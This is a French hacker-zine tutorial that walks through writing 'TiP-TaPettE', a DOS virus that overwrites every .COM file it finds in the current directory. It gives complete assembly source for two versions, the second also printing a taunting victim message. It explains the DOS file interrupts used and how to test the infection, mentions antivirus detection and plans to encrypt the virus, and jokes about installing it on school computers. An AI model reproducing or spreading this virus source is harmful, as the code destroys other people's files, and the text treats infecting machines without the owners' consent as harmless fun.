Virus Update  Sommaire  Infection dans les regles


TiP-TaPettE


Maintenant qu'on a les bases suffisantes en asm, on va creer notre (mon) infecteur de fichier *.com
Il se nommera TiP-TaPettE et sera un virus merdique. (car c'est un infecteur de .com et de plus il ecrase le fichier donc totalement pourri !lol)
Mais bon, faut bien commencer par quelquechose.

Detail du fonctionnement:
********************
fichier avant :

|-------------------------|
|       programme        |
|-------------------------|

fichier infecté :

|-------------------------|
|  Virus | gramme       |
|-------------------------|
Le com infecte sera donc carrement inutilisable et le virus ne se repandra que dans la directory de depart mais bon, encore une fois c'est juste pour apprendre.

Procede de l'infection:
******************

-Chercher un com dans la directory
-Si il y en a un, on l'ouvre
-Puis on inscrit le virus dedans
-On ferme le fichier
-On n'en cherche un autre
-Si on en trouve un on recommence

On voit donc que le virus est si con qu'il verifie meme pas si le com est deja infecte.

Allez un peu de source :
*******************

pour ouvrir un fichier:

---------------------------------------------------------------- 
l'interruption 21h code 3Dh 
pour l'appeler :

mettre en ah : 3Dh
       en dx : l'offset ou il y a le nom du fichier
               (finissant par un 0)
puis   int 21h pour appeler l'interruption
note : renvoie le handle du fichier en ax

----------------------------------------------------------------
pour ecrire dans un fichier:

---------------------------------------------------------------- 
l'interruption 21h code 40h 
pour l'appeler :

mettre en ah : 40h
       en bx : le handle du fichier
       en cx : le nombre d'octets a ecrire
       en dx : adresse du buffer source

puis   int 21h pour appeler l'interruption

----------------------------------------------------------------
pour fermer un fichier:

---------------------------------------------------------------- 
l'interruption 21h code 3Eh 
pour l'appeler :

mettre en ah : 3Eh
       en bx : le handle du fichier a fermer

puis   int 21h pour appeler l'interruption

----------------------------------------------------------------
Allez on y go :
************

voici donc le source a copier dans un fichier texte puis a renommer en virus.asm
*******************************************************************


.model small                 ;model de memoire
.code

ORG 100h                     ;car on fait un fichier com

debut:

   mov ah,4Eh                ;
   mov dx,offset fichiercom  ;findfirst
   int 21h                   ;

infection:

   jc fin                    ;si on trouve pas on quitte

   mov ax,3D01h              ;ouverture-du-fichier(le 01 indique qu'on ouvre
			     ;en ecriture)
   mov dx,9Eh                ;car nom en 9Eh
   int 21h

   mov bx,ax                 ;handle en bx
   mov ah,40h                ;ecriture
   mov cx,2Dh                ;taille de notre virus
   mov dx,100h               ;pointe au debut de notre com a recopier dans l'autre
   int 21h

                             
   mov ah,3Eh                ;fermeture-du-fichier
   int 21h
                             
   mov ah,4Fh                ;findnext
   int 21h                   ;si y en a pas on se casse
   jmp infection             ;si y en a on revient


fin:

   ret                       ;fini

   fichiercom db '*.COM',0   ;a la fin car c'est un .com

END debut

*******************************************************************

Puis la phase de test.
Mais comment tester notre virus ? Eh bien on se cree un repertoire test puis on met notre virus dedans.
Ensuite on cree un .com qu'on remplit avec le bloc note.
Et on lance le virus. Apres ca on regarde l'hexa du .com pour voir si il a bien ete infecte. Si c'est le cas on efface virus.com et on cree un autre com rempli au notepad. Puis on lance le fichier infecte.
Si il infecte l'autre alors on a gagné ! Mais bon notre virus il est foireux quand meme. On va essayer de faire en sorte qu'un fichier infecte envoie un message par le dos.
genre :"tu es la victime du virus TiP-GeNoCiDE, bonne journee !".

Allez on se met a l'oeuvre :

Voici le source qui ferait cela :

TiP-TaPettE virus
*****************

**************************** TiP-TaPettE **************************



.model small                 ;model de memoire
.code

ORG 100h                     ;car on fait un fichier com

debut:

   mov ah,4Eh               ; 
   mov dx,offset fichiercom ;findfirst
   int 21h                  ;

infection:

   jc fin                   ;si on trouve pas on quitte

   mov ax,3D01h             ;ouverture-du-fichier(le 01 indique qu'on ouvre 
			    ;en ecriture)
   mov dx,9Eh               ;car nom en 9Eh
   int 21h

   mov bx,ax                ;handle en bx
   mov ah,40h               ;ecriture
   mov cx,70h               ;taille de notre virus (beh voui il est plus gros)
   mov dx,100h              ;pointe au debut de notre com a recopier dans l'autre
   int 21h

                            ;fermeture-du-fichier
   mov ah,3Eh
   int 21h
                             
   mov ah,4Fh               ;findnext
   int 21h                  ;si y en a pas on se casse
   jmp infection            ;si y en a on revient


fin:

   mov dx,offset chaine     ;message en dx
   push ax                  ;on sauve ax car il est modifie
   mov ax,0900h             ;affichage du message
   int 21h
   pop ax                   ;on restaure ax

   ret                      ;fini

   fichiercom db '*.COM',0  ;a la fin car c'est un .com
   chaine db 'tu es la victime du virus TiP-TaPettE, bonne journee !$'

END debut


*******************************************************************
Bon on le teste. Arf j'en reviens pas, y marche du premier coup, c'est kewl.
Ce virus est quand meme une sacree grosse daube mais bon je suis content quand meme.
Cependant n'esperez pas niquer la planete avec vu le mal qu'il a a se repandre !lol. La prochaine fois (si il y en a une on fera un vrai virus).

Tiens en passant on va l'analyser avec anti viral toolkit pro pour voir (j'ai pas norton sur moi.).Hehe il est reconnu direct ! lol. J'essayerais de le crypter pour voir. J'espere que vous aurez autant de plaisir a lire cet article que j'en ai eu a le faire.
Sur ce, bonne programmation.

ps-lol: Et si je le mettais sur les PCs de mon etablissement scolaire !...:))


Tipiax


Virus Update  Sommaire  Infection dans les regles